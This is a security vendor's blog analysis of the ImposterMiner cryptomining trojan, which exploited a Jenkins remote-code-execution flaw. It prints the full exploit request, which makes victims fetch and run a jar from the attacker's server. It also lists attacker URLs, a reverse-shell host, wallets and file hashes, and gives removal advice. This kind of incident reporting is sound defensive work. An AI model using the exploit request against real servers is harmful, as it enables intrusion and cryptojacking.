ImposterMiner Trojan Takes Advantage of Newly Published Jenkins RCE Vulnerability

By Fan Wu and Fengwei Zhang

Introduction

“The wave of mining trojans does not stop in 2019, and this blog post presents the latest example. ImposterMiner takes advantage of a vulnerability in Jenkins, the world’s most popular CI tool, to compromise hosts, and then use them for crypto-mining and other malicious purposes.

More than just another example for mining trojans, ImposterMiner also teach us a valuable lesson: all of us, whitehats, blackhats, greyhats, read the same blogs, interact on the same forums, follow the same twitter profiles, and eventually exposed to the same published vulnerabilities. This means that once a security expert, a whitehat, reports on a new vulnerability, it makes all of us well informed, but it also instantly entices attackers to take advantage of a fresh attack vector. In this reality, organizations need to act upon a publication of a vulnerability with the same urgency they treat an actual attack.

Until that happens, please enjoy reading this in-depth analysis of the ImposterMiner Trojan.”

Yohai Einav

Principal Security Researcher, Alibaba Cloud Security Innovation Labs

Overview

The attacker directly copied the payload from Jenkins vulnerabilities described in the security researcher’s Orange.tw blog. The payload itself contains the word “Orange.tw”, which may confuse security researchers to believe it is an innocent. Therefore, we have named the Trojan “ImposterMiner”.

Most interesting things about ImposterMiner: First, it broke out only two days after the Jenkins vulnerability exploitation method was published. Second, the attacker implant a trojan directly onto hosts through web vulnerabilities, and the trojan does not further spread itself. These characteristics are similar to those of the “watchbog” mining Trojan that leveraged a vulnerability in Nexus Repository Manager 3.

In this article we analyze the structure of the ImposterMiner mining Trojan, and provides security suggestions on removal and prevention of similar events.

What Is ImposterMiner Trojan?

The figure above shows the infection process of the ImposterMiner Trojan. The attacker first attacks Jenkins service on vulnerable hosts, using the following payload:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile? value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1

Host:【victim_host】:【jenkins_port】

The attack vector we see here is an obvious copy from a vulnerability described in a blog post by “Orange.tw” (the security researcher who detected this vulnerability). If you need a proof for that, just carefully read the payload code. In addition, the payload also contains the acronym “poc” (Proof of Concept), which may deceive security researchers to believe that this is an unharmful test of the vulnerability, and not an actual attack.

The payload exploits a Jenkins RCE (Remote Command Execution) vulnerability (CVE-2019–1003000), instructing the victim host to retrieve a jar file from http://45.55.211.79/tw/orange/poc/8/poc-8.jar and execute it locally.

The poc-8.jar contains following code:

The requested http://45.55.211.79/.cache/jenkins/n2.sh script creates the /tmp/.scr folder and downloads s.tar.gz:

Decompression of s.tar.gz generates a folder as shown in the left figure below. The “go” script would be executed to run either “i686” or “x86_64” according to bit-length of current machine.

Both “i686” and “x86_64” are xmrig variants that mine Monero at nanopool.com (the world’s largest Bitcoin mining pool). They also add a scheduled task to run every 1 minute in crontab:

In addition, the 45.55.211.79 server holds a variety of payloads. Some have been previously used, while others have not.

For example, on March 7, Alibaba Cloud Security team observed the attacker using a similar payload to execute poc/5/poc-5.jar on a victim host. The code in poc-5.jar instructs the victim host to download and run the Tsunami Trojan, which receives commands through IRC and launches various attacks.

Another example is http://45.55.211.79/.cache/jenkins/jen.pl, a file stored on the attacker's server, which can send a reverse shell to 190.121.18.164:1090:

The modification dates of above mentioned malicious files indicate that the author of ImposterMiner is still updating them frequently. Content of these files also suggest that the author is not satisfied with merely mining on victim hosts; he is ready to use victim hosts as DDoS zombies, or use shell to manipulate them arbitrarily.

Scope of Impact

ImposterMiner Attack trend, compromised instances by day

The current wallet address of the ImposterMiner malicious mining Trojan is: 42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

Hashrate of this address fluctuates drastically, reaching up to 236 KH/s according to data on the mining pool website. The average hashrate is around 150 KH/s, indicating that 10,000 to 20,000 servers may have been infected and used for mining. Cumulative revenue of the wallet address is about 169 Monroe(9,120 US dollars).

In addition to the above addresses, the attacker has also used following wallet address: 4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5.

Security Recommendations

Potential profits result in

Jenkins vulnerabilities offer great incentive for attackers, and they tend to move quickly when a new exploit is published. This time, the Jenkins RCE (CVE-2019–1003000) was exploited to implant miners only two days after the vulnerability was made public, posing great threat for Jenkins users.

Alibaba Cloud Security provides the following suggestions for removal and further prevention of security incidents similar to ImposterMiner:

  1. Users are suggested to upgrade software as soon as newer versions become available, in order to avoid attacks and mining events like ImposterMiner mining Trojan. ImposterMiner not only attacks Jenkins, but also results in compromise in other parts of the production system. If a user suspects a host has been infected by ImposterMiner, it is suggested to check whether the /tmp/.scr malicious directory exists on the host, clear the /tmp directory, use the ps command to check whether a malicious process named “-bash” exists, and clear crontab files.
  2. Use the Next Generation Cloud Firewall products provided by Alibaba Cloud Security to block requests to malicious domains and configure intelligent strategy to defend against intrusions. Even with advanced obfuscation techniques, mining events need downloading, mining, and sending reverse shell, all of which require sending requests to other hosts. Therefore, interception of these requests by the cloud firewall will completely block the attack chain. In addition, you can use custom strategies to block malicious websites base on your own circumstances.
  3. Users with customization requirements may consider Alibaba Cloud Managed Security Service. Experienced security experts will help customize solutions suitable for you, help reinforce the system, and prevent intrusions. If an intrusion has already occurred, they can also assist in cleaning up systems and tracing attacks. This service is suitable for users with higher security requirements and enterprises that have not hired security engineers, but want to ensure system security.

IOC

4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5

42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

Mining pool address:

https://www.supportxmr.com

https://xmr.nanopool.org

Malicious program:

File namemd5x86_64(tsunami backdoor)1700ecbd3bddfab4979fbba416310eb0i686(tsunami backdoor)580f0dfc85a4c0e368e162cef38d3c08mx86_64(miner)a8d2d7f65c78ab724c987971fbdba5f0mi686(miner)9b961a26561ba2f49733603395d8275ex86_64(miner)dadd63b075f9485113a010569b88cb91i686(miner)ac0a6e081ae917c65ee3ae7555cdfac0

Malicious URL:

http://45.55.211.79/.cache/jenkins/*

http://45.55.211.79/tw/orange/poc/*

Malicious host:

190.121.18.164

Reference

  1. https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/

Reference:https://www.alibabacloud.com/blog/imposterminer-trojan-takes-advantage-of-newly-published-jenkins-rce-vulnerability_594729?spm=a2c41.12821067.0.0

Follow me to keep abreast with the latest technology news, industry insights, and developer trends.